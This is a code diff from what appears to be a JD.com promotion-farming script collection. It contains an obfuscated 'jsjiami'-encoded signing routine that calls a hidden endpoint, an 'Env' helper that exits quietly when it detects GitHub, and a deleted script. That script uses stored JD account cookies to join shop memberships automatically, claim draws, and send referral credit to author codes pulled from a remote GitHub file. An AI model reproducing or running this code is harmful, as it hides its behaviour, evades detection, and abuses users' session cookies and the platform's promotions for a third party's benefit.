_0x53384e={'\x6d\x4d\x51\x6b\x76':function(_0x26e196){return _0x1f470d[_0x27de('‫44')](_0x26e196);}};try{if(_0x1f470d[_0x27de('‮45')](_0x1f470d[_0x27de('‫46')],_0x1f470d[_0x27de('‮47')])){if(_0x311afb){if(_0x1f470d[_0x27de('‫48')](_0x1f470d[_0x27de('‫49')],_0x1f470d[_0x27de('‫49')])){console[_0x27de('‫1d')](_0x311afb);}else{console[_0x27de('‫1d')](error);}}else{if(_0x1f470d[_0x27de('‮4a')](_0x1f470d[_0x27de('‫4b')],_0x1f470d[_0x27de('‮4c')])){_0x53384e[_0x27de('‮4d')](_0x2c2848);}else{res=JSON[_0x27de('‫1e')](_0x4c2873);if(res[_0x27de('‮1f')]){if(_0x1f470d[_0x27de('‮4a')](_0x1f470d[_0x27de('‫4e')],_0x1f470d[_0x27de('‫4e')])){console[_0x27de('‫1d')](res);$[_0x27de('‫4f')]=res[_0x27de('‮50')];}else{console[_0x27de('‫1d')](_0x311afb);}}}}}else{Host=process[_0x27de('‮51')][_0x27de('‫52')];}}catch(_0x317968){if(_0x1f470d[_0x27de('‮4a')](_0x1f470d[_0x27de('‮53')],_0x1f470d[_0x27de('‮53')])){console[_0x27de('‫1d')](_0x317968);}else{$[_0x27de('‮22')]=res[_0x27de('‮20')][_0x27de('‮21')][0x0][_0x27de('‫23')][_0x27de('‮24')];}}finally{if(_0x1f470d[_0x27de('‮45')](_0x1f470d[_0x27de('‫54')],_0x1f470d[_0x27de('‫54')])){_0x1f470d[_0x27de('‫44')](_0x2c2848);}else{_0x1f470d[_0x27de('‫44')](_0x2c2848);}}});});}function geth5st(_0x1c2dc4,_0x38bbf9){var _0xad3eae={'\x76\x59\x42\x64\x48':function(_0xb6682a,_0x1dbeb1){return _0xb6682a===_0x1dbeb1;},'\x42\x4d\x46\x6b\x79':_0x27de('‮55'),'\x69\x75\x7a\x6b\x51':function(_0x521e0c,_0x1ffbd9){return _0x521e0c!==_0x1ffbd9;},'\x67\x48\x77\x45\x7a':_0x27de('‮56'),'\x53\x65\x4c\x46\x71':_0x27de('‮57'),'\x45\x6e\x58\x7a\x59':function(_0x4fa54e,_0x1f1dc2){return _0x4fa54e===_0x1f1dc2;},'\x50\x7a\x78\x71\x48':_0x27de('‮58'),'\x4e\x54\x41\x51\x50':function(_0x3fd51b,_0x32a444){return _0x3fd51b(_0x32a444);},'\x6b\x45\x71\x7a\x71':_0x27de('‫59'),'\x6a\x56\x58\x70\x71':_0x27de('‫5a'),'\x41\x6d\x4e\x72\x49':_0x27de('‮5b'),'\x71\x69\x42\x77\x67':_0x27de('‫5c'),'\x6c\x59\x56\x78\x6b':function(_0x2a05e2,_0x15824){return _0x2a05e2*_0x15824;},'\x44\x66\x5a\x6f\x68':_0x27de('‫5d'),'\x58\x43\x7a\x6e\x76':function(_0x46d10b,_0x5b5da1){return _0x46d10b*_0x5b5da1;}};return new Promise(async _0x573221=>{var _0x1c0efb={'\x4a\x47\x49\x4a\x4a':function(_0x30195c,_0x3fe97e){return _0xad3eae[_0x27de('‮5e')](_0x30195c,_0x3fe97e);},'\x63\x4c\x75\x59\x57':_0xad3eae[_0x27de('‫5f')],'\x4a\x65\x6d\x76\x48':function(_0x41b061,_0x2c0980){return _0xad3eae[_0x27de('‫60')](_0x41b061,_0x2c0980);},'\x54\x53\x65\x61\x46':_0xad3eae[_0x27de('‫61')],'\x66\x57\x66\x4f\x54':_0xad3eae[_0x27de('‮62')],'\x7a\x4f\x48\x74\x48':function(_0x1029f8,_0x21337a){return _0xad3eae[_0x27de('‮63')](_0x1029f8,_0x21337a);},'\x54\x5a\x6e\x42\x6a':_0xad3eae[_0x27de('‫64')],'\x6b\x47\x41\x51\x44':function(_0x1b9d1f,_0x3ee921){return _0xad3eae[_0x27de('‫65')](_0x1b9d1f,_0x3ee921);}};let _0x23db17={'\x61\x70\x70\x49\x64':_0xad3eae[_0x27de('‫66')],'\x62\x6f\x64\x79':{'\x61\x70\x70\x69\x64':_0xad3eae[_0x27de('‫67')],'\x66\x75\x6e\x63\x74\x69\x6f\x6e\x49\x64':_0x1c2dc4,'\x62\x6f\x64\x79':JSON[_0x27de('‫8')](_0x38bbf9),'\x63\x6c\x69\x65\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e':_0xad3eae[_0x27de('‫68')],'\x63\x6c\x69\x65\x6e\x74':'\x48\x35','\x61\x63\x74\x69\x76\x69\x74\x79\x49\x64':$[_0x27de('‮24')]},'\x63\x61\x6c\x6c\x62\x61\x63\x6b\x41\x6c\x6c':!![]};let _0x2402da='';let _0x25911c=[_0xad3eae[_0x27de('‮69')]];if(process[_0x27de('‮51')][_0x27de('‫52')]){_0x2402da=process[_0x27de('‮51')][_0x27de('‫52')];}else{_0x2402da=_0x25911c[Math[_0x27de('‫6a')](_0xad3eae[_0x27de('‫6b')](Math[_0x27de('‫6c')](),_0x25911c[_0x27de('‮6d')]))];}let _0x5f5ad9={'\x75\x72\x6c':_0x27de('‮6e'),'\x62\x6f\x64\x79':JSON[_0x27de('‫8')](_0x23db17),'\x68\x65\x61\x64\x65\x72\x73':{'\x48\x6f\x73\x74':_0x2402da,'Content-Type':_0xad3eae[_0x27de('‮6f')]},'\x74\x69\x6d\x65\x6f\x75\x74':_0xad3eae[_0x27de('‫70')](0x1e,0x3e8)};$[_0x27de('‮71')](_0x5f5ad9,async(_0x4a1749,_0x300e08,_0x23db17)=>{if(_0x1c0efb[_0x27de('‫72')](_0x1c0efb[_0x27de('‫73')],_0x1c0efb[_0x27de('‫73')])){try{if(_0x4a1749){if(_0x1c0efb[_0x27de('‮74')](_0x1c0efb[_0x27de('‮75')],_0x1c0efb[_0x27de('‮76')])){_0x23db17=await geth5st[_0x27de('‮77')](this,arguments);}else{if(res[_0x27de('‮20')][_0x27de('‮21')]){$[_0x27de('‮22')]=res[_0x27de('‮20')][_0x27de('‮21')][0x0][_0x27de('‫23')][_0x27de('‮24')];}}}else{}}catch(_0x580180){if(_0x1c0efb[_0x27de('‫78')](_0x1c0efb[_0x27de('‮79')],_0x1c0efb[_0x27de('‮79')])){$[_0x27de('‫7a')](_0x580180,_0x300e08);}else{if(_0x4a1749){console[_0x27de('‫1d')](_0x4a1749);}else{res=JSON[_0x27de('‫1e')](_0x23db17);if(res[_0x27de('‮1f')]){console[_0x27de('‫1d')](res);$[_0x27de('‫4f')]=res[_0x27de('‮50')];}}}}finally{_0x1c0efb[_0x27de('‫7b')](_0x573221,_0x23db17);}}else{res=JSON[_0x27de('‫1e')](_0x23db17);if(res[_0x27de('‮1f')]){console[_0x27de('‫1d')](res);$[_0x27de('‫4f')]=res[_0x27de('‮50')];}}});});};_0xod7='jsjiami.com.v6'; - -function Env(t,e){"undefined"!=typeof process&&JSON.stringify(process.env).indexOf("GITHUB")>-1&&process.exit(0);class s{constructor(t){this.env=t}send(t,e="GET"){t="string"==typeof t?{url:t}:t;let s=this.get;return"POST"===e&&(s=this.post),new Promise((e,i)=>{s.call(this,t,(t,s,r)=>{t?i(t):e(s)})})}get(t){return this.send.call(this.env,t)}post(t){return this.send.call(this.env,t,"POST")}}return new class{constructor(t,e){this.name=t,this.http=new s(this),this.data=null,this.dataFile="box.dat",this.logs=[],this.isMute=!1,this.isNeedRewrite=!1,this.logSeparator="\n",this.startTime=(new Date).getTime(),Object.assign(this,e),this.log("",`🔔${this.name}, 开始!`)}isNode(){return"undefined"!=typeof module&&!!module.exports}isQuanX(){return"undefined"!=typeof $task}isSurge(){return"undefined"!=typeof $httpClient&&"undefined"==typeof $loon}isLoon(){return"undefined"!=typeof $loon}toObj(t,e=null){try{return JSON.parse(t)}catch{return e}}toStr(t,e=null){try{return JSON.stringify(t)}catch{return e}}getjson(t,e){let s=e;const i=this.getdata(t);if(i)try{s=JSON.parse(this.getdata(t))}catch{}return s}setjson(t,e){try{return this.setdata(JSON.stringify(t),e)}catch{return!1}}getScript(t){return new Promise(e=>{this.get({url:t},(t,s,i)=>e(i))})}runScript(t,e){return new Promise(s=>{let i=this.getdata("@chavy_boxjs_userCfgs.httpapi");i=i?i.replace(/\n/g,"").trim():i;let r=this.getdata("@chavy_boxjs_userCfgs.httpapi_timeout");r=r?1*r:20,r=e&&e.timeout?e.timeout:r;const[o,h]=i.split("@"),n={url:`http://${h}/v1/scripting/evaluate`,body:{script_text:t,mock_type:"cron",timeout:r},headers:{"X-Key":o,Accept:"*/*"}};this.post(n,(t,e,i)=>s(i))}).catch(t=>this.logErr(t))}loaddata(){if(!this.isNode())return{};{this.fs=this.fs?this.fs:require("fs"),this.path=this.path?this.path:require("path");const t=this.path.resolve(this.dataFile),e=this.path.resolve(process.cwd(),this.dataFile),s=this.fs.existsSync(t),i=!s&&this.fs.existsSync(e);if(!s&&!i)return{};{const i=s?t:e;try{return JSON.parse(this.fs.readFileSync(i))}catch(t){return{}}}}}writedata(){if(this.isNode()){this.fs=this.fs?this.fs:require("fs"),this.path=this.path?this.path:require("path");const t=this.path.resolve(this.dataFile),e=this.path.resolve(process.cwd(),this.dataFile),s=this.fs.existsSync(t),i=!s&&this.fs.existsSync(e),r=JSON.stringify(this.data);s?this.fs.writeFileSync(t,r):i?this.fs.writeFileSync(e,r):this.fs.writeFileSync(t,r)}}lodash_get(t,e,s){const i=e.replace(/\[(\d+)\]/g,".$1").split(".");let r=t;for(const t of i)if(r=Object(r)[t],void 0===r)return s;return r}lodash_set(t,e,s){return Object(t)!==t?t:(Array.isArray(e)||(e=e.toString().match(/[^.[\]]+/g)||[]),e.slice(0,-1).reduce((t,s,i)=>Object(t[s])===t[s]?t[s]:t[s]=Math.abs(e[i+1])>>0==+e[i+1]?[]:{},t)[e[e.length-1]]=s,t)}getdata(t){let e=this.getval(t);if(/^@/.test(t)){const[,s,i]=/^@(.*?)\.(.*?)$/.exec(t),r=s?this.getval(s):"";if(r)try{const t=JSON.parse(r);e=t?this.lodash_get(t,i,""):e}catch(t){e=""}}return e}setdata(t,e){let s=!1;if(/^@/.test(e)){const[,i,r]=/^@(.*?)\.(.*?)$/.exec(e),o=this.getval(i),h=i?"null"===o?null:o||"{}":"{}";try{const e=JSON.parse(h);this.lodash_set(e,r,t),s=this.setval(JSON.stringify(e),i)}catch(e){const o={};this.lodash_set(o,r,t),s=this.setval(JSON.stringify(o),i)}}else s=this.setval(t,e);return s}getval(t){return this.isSurge()||this.isLoon()?$persistentStore.read(t):this.isQuanX()?$prefs.valueForKey(t):this.isNode()?(this.data=this.loaddata(),this.data[t]):this.data&&this.data[t]||null}setval(t,e){return this.isSurge()||this.isLoon()?$persistentStore.write(t,e):this.isQuanX()?$prefs.setValueForKey(t,e):this.isNode()?(this.data=this.loaddata(),this.data[e]=t,this.writedata(),!0):this.data&&this.data[e]||null}initGotEnv(t){this.got=this.got?this.got:require("got"),this.cktough=this.cktough?this.cktough:require("tough-cookie"),this.ckjar=this.ckjar?this.ckjar:new this.cktough.CookieJar,t&&(t.headers=t.headers?t.headers:{},void 0===t.headers.Cookie&&void 0===t.cookieJar&&(t.cookieJar=this.ckjar))}get(t,e=(()=>{})){t.headers&&(delete t.headers["Content-Type"],delete t.headers["Content-Length"]),this.isSurge()||this.isLoon()?(this.isSurge()&&this.isNeedRewrite&&(t.headers=t.headers||{},Object.assign(t.headers,{"X-Surge-Skip-Scripting":!1})),$httpClient.get(t,(t,s,i)=>{!t&&s&&(s.body=i,s.statusCode=s.status),e(t,s,i)})):this.isQuanX()?(this.isNeedRewrite&&(t.opts=t.opts||{},Object.assign(t.opts,{hints:!1})),$task.fetch(t).then(t=>{const{statusCode:s,statusCode:i,headers:r,body:o}=t;e(null,{status:s,statusCode:i,headers:r,body:o},o)},t=>e(t))):this.isNode()&&(this.initGotEnv(t),this.got(t).on("redirect",(t,e)=>{try{if(t.headers["set-cookie"]){const s=t.headers["set-cookie"].map(this.cktough.Cookie.parse).toString();s&&this.ckjar.setCookieSync(s,null),e.cookieJar=this.ckjar}}catch(t){this.logErr(t)}}).then(t=>{const{statusCode:s,statusCode:i,headers:r,body:o}=t;e(null,{status:s,statusCode:i,headers:r,body:o},o)},t=>{const{message:s,response:i}=t;e(s,i,i&&i.body)}))}post(t,e=(()=>{})){if(t.body&&t.headers&&!t.headers["Content-Type"]&&(t.headers["Content-Type"]="application/x-www-form-urlencoded"),t.headers&&delete t.headers["Content-Length"],this.isSurge()||this.isLoon())this.isSurge()&&this.isNeedRewrite&&(t.headers=t.headers||{},Object.assign(t.headers,{"X-Surge-Skip-Scripting":!1})),$httpClient.post(t,(t,s,i)=>{!t&&s&&(s.body=i,s.statusCode=s.status),e(t,s,i)});else if(this.isQuanX())t.method="POST",this.isNeedRewrite&&(t.opts=t.opts||{},Object.assign(t.opts,{hints:!1})),$task.fetch(t).then(t=>{const{statusCode:s,statusCode:i,headers:r,body:o}=t;e(null,{status:s,statusCode:i,headers:r,body:o},o)},t=>e(t));else if(this.isNode()){this.initGotEnv(t);const{url:s,...i}=t;this.got.post(s,i).then(t=>{const{statusCode:s,statusCode:i,headers:r,body:o}=t;e(null,{status:s,statusCode:i,headers:r,body:o},o)},t=>{const{message:s,response:i}=t;e(s,i,i&&i.body)})}}time(t,e=null){const s=e?new Date(e):new Date;let i={"M+":s.getMonth()+1,"d+":s.getDate(),"H+":s.getHours(),"m+":s.getMinutes(),"s+":s.getSeconds(),"q+":Math.floor((s.getMonth()+3)/3),S:s.getMilliseconds()};/(y+)/.test(t)&&(t=t.replace(RegExp.$1,(s.getFullYear()+"").substr(4-RegExp.$1.length)));for(let e in i)new RegExp("("+e+")").test(t)&&(t=t.replace(RegExp.$1,1==RegExp.$1.length?i[e]:("00"+i[e]).substr((""+i[e]).length)));return t}msg(e=t,s="",i="",r){const o=t=>{if(!t)return t;if("string"==typeof t)return this.isLoon()?t:this.isQuanX()?{"open-url":t}:this.isSurge()?{url:t}:void 0;if("object"==typeof t){if(this.isLoon()){let e=t.openUrl||t.url||t["open-url"],s=t.mediaUrl||t["media-url"];return{openUrl:e,mediaUrl:s}}if(this.isQuanX()){let e=t["open-url"]||t.url||t.openUrl,s=t["media-url"]||t.mediaUrl;return{"open-url":e,"media-url":s}}if(this.isSurge()){let e=t.url||t.openUrl||t["open-url"];return{url:e}}}};if(this.isMute||(this.isSurge()||this.isLoon()?$notification.post(e,s,i,o(r)):this.isQuanX()&&$notify(e,s,i,o(r))),!this.isMuteLog){let t=["","==============📣系统通知📣=============="];t.push(e),s&&t.push(s),i&&t.push(i),console.log(t.join("\n")),this.logs=this.logs.concat(t)}}log(...t){t.length>0&&(this.logs=[...this.logs,...t]),console.log(t.join(this.logSeparator))}logErr(t,e){const s=!this.isSurge()&&!this.isQuanX()&&!this.isLoon();s?this.log("",`❗️${this.name}, 错误!`,t.stack):this.log("",`❗️${this.name}, 错误!`,t)}wait(t){return new Promise(e=>setTimeout(e,t))}done(t={}){const e=(new Date).getTime(),s=(e-this.startTime)/1e3;this.log("",`🔔${this.name}, 结束! 🕛 ${s} 秒`),this.log(),(this.isSurge()||this.isQuanX()||this.isLoon())&&$done(t)}}(t,e)} diff --git a/jd_lzdz1_customized612.js b/jd_lzdz1_customized612.js deleted file mode 100644 index a6290e1..0000000 --- a/jd_lzdz1_customized612.js +++ /dev/null @@ -1,562 +0,0 @@ -/* -酒水会员盛典 -7 7 7 7 7 jd_lzdz1_customized612.js -*/ -const $ = new Env("酒水会员盛典"); -const jdCookieNode = $.isNode() ? require("./jdCookie.js") : ""; -const notify = $.isNode() ? require("./sendNotify") : ""; -let cookiesArr = [], cookie = "", message = ""; -let ownCode = null; -let authorCodeList = []; -if ($.isNode()) { - Object.keys(jdCookieNode).forEach((item) => { - cookiesArr.push(jdCookieNode[item]); - }); - if (process.env.JD_DEBUG && process.env.JD_DEBUG === "false") console.log = () => {}; -} else { - let cookiesData = $.getdata("CookiesJD") || "[]"; - cookiesData = JSON.parse(cookiesData); - cookiesArr = cookiesData.map((item) => item.cookie); - cookiesArr.reverse(); - cookiesArr.push(...[$.getdata("CookieJD2"), $.getdata("CookieJD")]); - cookiesArr.reverse(); - cookiesArr = cookiesArr.filter((item) => !!item); -} -!(async () => { - $.getAuthorCodeListerr = false; - if (!cookiesArr[0]) { - $.msg($.name, "【提示】请先获取京东账号一cookie\n直接使用NobyDa的京东签到获取", "https://bean.m.jd.com/bean/signIndex.action", { "open-url": "https://bean.m.jd.com/bean/signIndex.action" }); - return; - } - authorCodeList = await getAuthorCodeList('https://raw.githubusercontent.com/okyyds/duck/master/code/lzdz1.json') - // console.log(authorCodeList) - if ($.getAuthorCodeListerr === false) { - authorCodeList = [ - 'ce70b442586945668414fde6d813ab86', - '1582a55c4a8442d79819fd90e75b2d66', - 'a3b625f7fcc14a3d84237c2543461f0c', - ] - } - for (let i = 0; i < cookiesArr.length; i++) { - if (cookiesArr[i]) { - cookie = cookiesArr[i]; - originCookie = cookiesArr[i]; - newCookie = ""; - $.UserName = decodeURIComponent(cookie.match(/pt_pin=(.+?);/) && cookie.match(/pt_pin=(.+?);/)[1]); - $.index = i + 1; - $.isLogin = true; - $.nickName = ""; - $.getFirstLZCKerr = '' - await checkCookie(); - console.log(`\n******开始【京东账号${$.index}】${$.nickName || $.UserName}*********\n`); - if (!$.isLogin) { - $.msg($.name, `【提示】cookie已失效`, `京东账号${$.index} ${$.nickName || $.UserName}\n请重新登录获取\nhttps://bean.m.jd.com/bean/signIndex.action`, { "open-url": "https://bean.m.jd.com/bean/signIndex.action" }); - // if ($.isNode()) { - // await notify.sendNotify(`${$.name}cookie已失效 - ${$.UserName}`, `京东账号${$.index} ${$.UserName}\n请重新登录获取cookie`); - // } - continue; - } - $.bean = 0; - $.ADID = getUUID("xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", 1); - $.UUID = getUUID("xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"); - // authorCodeList = [ - // 'ce70b442586945668414fde6d813ab86', - // // '1582a55c4a8442d79819fd90e75b2d66', - // // 'a3b625f7fcc14a3d84237c2543461f0c', - // ]; - // $.authorCode = authorCodeList[random(0, authorCodeList.length)]; - $.authorCode = ownCode ? ownCode : authorCodeList[random(0, authorCodeList.length)] - $.authorNum = `${random(1000000, 9999999)}`; - $.randomCode = random(1000000, 9999999); - $.activityId = "dz9466823d5b5e4bc589b07d35e6ac"; - $.activityShopId = "1000097168"; - $.activityUrl = `https://lzdz1-isv.isvjcloud.com/dingzhi/drinkcategory/piecetoge1/activity/${$.authorNum}?activityId=${$.activityId}&shareUuid=${encodeURIComponent($.authorCode)}&adsource=null&shareuserid4minipg=${encodeURIComponent($.secretPin)}&shopid=1000097168&lng=00.000000&lat=00.000000&sid=&un_area=`; - await member(); - if ($.getFirstLZCKerr.indexOf('493') != -1) { - break - } - await $.wait(1500); - if ($.bean > 0) { - message += `\n【京东账号${$.index}】${$.nickName || $.UserName} \n └ 获得 ${$.bean} 京豆。`; - } - } - } - if (message !== "") { - if ($.isNode()) { - await notify.sendNotify($.name, message, "", `\n`); - } else { - $.msg($.name, "有点儿收获", message); - } - } -})() - .catch((e) => { - $.log("", `❌ ${$.name}, 失败! 原因: ${e}!`, ""); - }) - .finally(() => { - $.done(); - }); - -async function member() { - $.token = null; - $.secretPin = null; - $.openCardActivityId = null; - $.doFollowShop = false - lz_cookie = {}; - await getFirstLZCK(); - await getToken(); - await task("dz/common/getSimpleActInfoVo", `activityId=${$.activityId}`, 1); - if ($.token) { - await getMyPing(); - if ($.secretPin) { - console.log("去助力 -> " + $.authorCode); - await taskaccessLog("common/accessLogWithAD", `venderId=${$.activityShopId}&code=99&pin=${encodeURIComponent($.secretPin)}&activityId=${$.activityId}&pageUrl=${$.activityUrl}&subType=app&adSource=null`, 1); - await task("wxActionCommon/getUserInfo", `pin=${encodeURIComponent($.secretPin)}`, 1); - // console.log(cookie) - if ($.index === 1) { - await task("drinkcategory/piecetoge1/activityContent", `activityId=${$.activityId}&pin=${encodeURIComponent($.secretPin)}&pinImg=&nick=${encodeURIComponent($.pin)}&cjyxPin=&cjhyPin=&shareUuid=${encodeURIComponent($.authorCode)}`, 0, 1); - } else { - await task("drinkcategory/piecetoge1/activityContent", `activityId=${$.activityId}&pin=${encodeURIComponent($.secretPin)}&pinImg=&nick=${encodeURIComponent($.pin)}&cjyxPin=&cjhyPin=&shareUuid=${encodeURIComponent($.authorCode)}`); - } - $.log("关注店铺"); - await task("drinkcategory/piecetoge1/saveTask", `activityId=${$.activityId}&actorUuid=${encodeURIComponent($.actorUuid)}&pin=${encodeURIComponent($.secretPin)}&taskType=23&taskValue=23&shareUuid=${encodeURIComponent($.authorCode)}`); - await task("taskact/common/drawContent", `activityId=${$.activityId}&pin=${encodeURIComponent($.secretPin)}`); - await task("drinkcategory/piecetoge1/initOpenCard", `pin=${encodeURIComponent($.secretPin)}&activityId=${$.activityId}&shareUuid=${encodeURIComponent($.authorCode)}`); - $.log("加入店铺会员"); - if ($.openCardList) { - taskList = []; - $.openCardList.filter((x) => { if (!x.openStatus) { taskList.push(x) } }) - for (const vo of taskList) { - // console.log(vo.openStatus) - $.log(`>>> 去加入 ${vo.venderId}`); - if (vo.openStatus === false) { - $.log(`>>> 准备加入会员`); - await getShopOpenCardInfo({ venderId: `${vo.venderId}`, channel: "401" }, vo.venderId); - await bindWithVender({ venderId: `${vo.venderId}`, bindByVerifyCodeFlag: 1, registerExtend: {}, writeChildFlag: 0, activityId: $.openCardActivityId, channel: 401 }, vo.venderId); - await $.wait(1500); - } else { - $.log(`>>> 已经是会员`); - } - } - console.log("绑定助力"); - await task("drinkcategory/piecetoge1/initOpenCard", `pin=${encodeURIComponent($.secretPin)}&activityId=${$.activityId}&shareUuid=${encodeURIComponent($.authorCode)}`); - } - - // console.log("去助力 -> " + $.authorCode); - // await task("linkgame/assist/status", `activityId=${$.activityId}&pin=${encodeURIComponent($.secretPin)}&shareUuid=${$.authorCode}`); - // await task("linkgame/assist", `activityId=${$.activityId}&pin=${encodeURIComponent($.secretPin)}&shareUuid=${$.authorCode}`); - // await task('linkgame/help/list', `pin=${encodeURIComponent($.secretPin)}&activityId=${$.activityId}`) - // await task('drinkcategory/piecetoge1/startGame', `pin=${encodeURIComponent($.secretPin)}&activityId=${$.activityId}`) - // await task('drinkcategory/piecetoge1/endGame', `pin=${encodeURIComponent($.secretPin)}&activityId=${$.activityId}&gameId=${$.gameId}&score=${$.score}`) - // console.log('任务 -> ') - // await $.wait(2000) - // await task('opencard/addCart', `activityId=${$.activityId}&pin=${encodeURIComponent($.secretPin)}`); - // await $.wait(2000) - // await task('linkgame/sendAllCoupon', `activityId=${$.activityId}&pin=${encodeURIComponent($.secretPin)}`); - // await getFirstLZCK() - // await getToken(); - // console.log('抽奖 -> ') - // await $.wait(2000) - // await task('drinkcategory/piecetoge1/draw', `activityId=${$.activityId}&pin=${encodeURIComponent($.secretPin)}`); - // await $.wait(2000) - // await task('drinkcategory/piecetoge1/draw', `activityId=${$.activityId}&pin=${encodeURIComponent($.secretPin)}`); - // await $.wait(2000) - // await task('drinkcategory/piecetoge1/draw', `activityId=${$.activityId}&pin=${encodeURIComponent($.secretPin)}`); - // await $.wait(2000) - // await task('drinkcategory/piecetoge1/draw', `activityId=${$.activityId}&pin=${encodeURIComponent($.secretPin)}`); - await $.wait(2000) - await task('drinkcategory/piecetoge1/draw', `activityId=${$.activityId}&pin=${encodeURIComponent($.secretPin)}`); - // console.log('100 -> ') - // await getFirstLZCK() - // await getToken(); - // await $.wait(2000) - // await task('linkgame/draw/record', `activityId=${$.activityId}&actorUuid=${$.actorUuid}&pin=${encodeURIComponent($.secretPin)}`); - } - } -} - -function task(function_id, body, isCommon = 0, own = 0) { - return new Promise((resolve) => { - $.post(taskUrl(function_id, body, isCommon), async (err, resp, data) => { - try { - if (err) { - $.log(err); - } else { - if (data) { - data = JSON.parse(data); - if (data.result) { - switch (function_id) { - case "dz/common/getSimpleActInfoVo": - $.jdActivityId = data.data.jdActivityId; - $.venderId = data.data.venderId; - $.activityType = data.data.activityType; - // console.log($.venderId) - break; - case "wxActionCommon/getUserInfo": - break; - case "drinkcategory/piecetoge1/activityContent": - if (!data.data.hasEnd) { - $.log(`开启【${data.data.activityName}】活动`); - $.log("-------------------"); - if ($.index === 1) { - ownCode = data.data.actorUuid; - console.log(ownCode); - } - $.actorUuid = data.data.actorUuid; - } else { - $.log("活动已经结束"); - } - break; - case "drinkcategory/piecetoge1/initOpenCard": - $.openCardList = data.data.openInfo; - $.openCardStatus = data.data.allOpenCard; - // console.log(data) - break; - case "drinkcategory/piecetoge1/saveTask": - if (data) { - console.log(data); - $.doFollowShop = true - } - break; - case "drinkcategory/piecetoge1/draw": - console.log(data); - break; - case "opencard/addCart": - if (data.data) { - console.log(data.data); - } - break; - case "linkgame/sendAllCoupon": - if (data.data) { - console.log(data.data); - } - - break; - case "interaction/write/writePersonInfo": - console.log(data); - break; - case "linkgame/draw": - console.log(data); - break; - case "linkgame/draw/record": - console.log(data.data); - break; - case "linkgame/assist/status": - $.log(JSON.stringify(data)); - break; - case "linkgame/assist": - $.log(JSON.stringify(data)); - break; - case "opencard/help/list": - $.log(JSON.stringify(data)); - break; - default: - // $.log(JSON.stringify(data)) - break; - } - } else { - // $.log(JSON.stringify(data)) - } - } else { - // $.log("京东没有返回数据") - } - } - } catch (error) { - $.log(error); - } finally { - resolve(); - } - }); - }); -} -function taskaccessLog(function_id, body, isCommon = 0) { - return new Promise((resolve) => { - $.post(taskUrl(function_id, body, isCommon), async (err, resp, data) => { - try { - if (err) { - $.log(err); - } else { - // console.log(resp); - if (resp["headers"]["set-cookie"]) { - cookie = `${originCookie};`; - for (let sk of resp["headers"]["set-cookie"]) { - lz_cookie[sk.split(";")[0].substr(0, sk.split(";")[0].indexOf("="))] = sk.split(";")[0].substr(sk.split(";")[0].indexOf("=") + 1); - } - for (const vo of Object.keys(lz_cookie)) { - cookie += vo + "=" + lz_cookie[vo] + ";"; - } - } - } - } catch (error) { - console.log(error); - } finally { - resolve(); - } - }); - }); -} - -function getAuthorCodeList(url) { - return new Promise((resolve) => { - const options = { - url: `${url}?${new Date()}`, - timeout: 10000, - headers: { - "User-Agent": "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Edg/87.0.4280.88", - }, - }; - $.get(options, async (err, resp, data) => { - try { - if (err) { - // $.log(err) - $.getAuthorCodeListerr = false; - } else { - if (data) data = JSON.parse(data); - $.getAuthorCodeListerr = true; - } - } catch (e) { - $.logErr(e, resp); - data = null; - } finally { - resolve(data); - } - }); - }); -} - -function taskUrl(function_id, body, isCommon) { - return { - url: isCommon ? `https://lzdz1-isv.isvjcloud.com/${function_id}` : `https://lzdz1-isv.isvjcloud.com/dingzhi/${function_id}`, - headers: { - Host: "lzdz1-isv.isvjcloud.com", - Accept: "application/json", - "X-Requested-With": "XMLHttpRequest", - "Accept-Language": "zh-cn", - "Accept-Encoding": "gzip, deflate, br", - "Content-Type": "application/x-www-form-urlencoded", - Origin: "https://lzdz1-isv.isvjcloud.com", - "User-Agent": `jdapp;iPhone;9.5.4;13.6;${$.UUID};network/wifi;ADID/${$.ADID};model/iPhone10,3;addressid/0;appBuild/167668;jdSupportDarkMode/0;Mozilla/5.0 (iPhone; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148;supportJDSHWK/1`, - Connection: "keep-alive", - Referer: $.activityUrl, - Cookie: $.cookie, - }, - body: body, - }; -} - -function getMyPing() { - let opt = { - url: `https://lzdz1-isv.isvjcloud.com/customer/getMyPing`, - headers: { - Host: "lzdz1-isv.isvjcloud.com", - Accept: "application/json", - "X-Requested-With": "XMLHttpRequest", - "Accept-Language": "zh-cn", - "Accept-Encoding": "gzip, deflate, br", - "Content-Type": "application/x-www-form-urlencoded", - Origin: "https://lzdz1-isv.isvjcloud.com", - "User-Agent": `jdapp;iPhone;9.5.4;13.6;${$.UUID};network/wifi;ADID/${$.ADID};model/iPhone10,3;addressid/0;appBuild/167668;jdSupportDarkMode/0;Mozilla/5.0 (iPhone; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148;supportJDSHWK/1`, - Connection: "keep-alive", - Referer: $.activityUrl, - Cookie: cookie, - }, - body: `userId=${$.activityShopId}&token=${$.token}&fromType=APP&riskType=1`, - }; - return new Promise((resolve) => { - $.post(opt, (err, resp, data) => { - try { - if (err) { - $.log(err); - } else { - if (resp["headers"]["set-cookie"]) { - cookie = `${originCookie}`; - if ($.isNode()) { - for (let sk of resp["headers"]["set-cookie"]) { - cookie = `${cookie}${sk.split(";")[0]};`; - } - } else { - for (let ck of resp["headers"]["Set-Cookie"].split(",")) { - cookie = `${cookie}${ck.split(";")[0]};`; - } - } - } - if (resp["headers"]["Set-Cookie"]) { - cookie = `${originCookie}`; - if ($.isNode()) { - for (let sk of resp["headers"]["set-cookie"]) { - cookie = `${cookie}${sk.split(";")[0]};`; - } - } else { - for (let ck of resp["headers"]["Set-Cookie"].split(",")) { - cookie = `${cookie}${ck.split(";")[0]};`; - } - } - } - if (data) { - data = JSON.parse(data); - if (data.result) { - $.log(`你好:${data.data.nickname}`); - $.pin = data.data.nickname; - $.secretPin = data.data.secretPin; - cookie = `${cookie};AUTH_C_USER=${data.data.secretPin}`; - } else { - $.log(data.errorMessage); - } - } else { - $.log("京东返回了空数据"); - } - } - } catch (error) { - $.log(error); - } finally { - resolve(); - } - }); - }); -} -function getFirstLZCK() { - return new Promise((resolve) => { - $.get( - { - url: $.activityUrl, - headers: { - "user-agent": $.isNode() 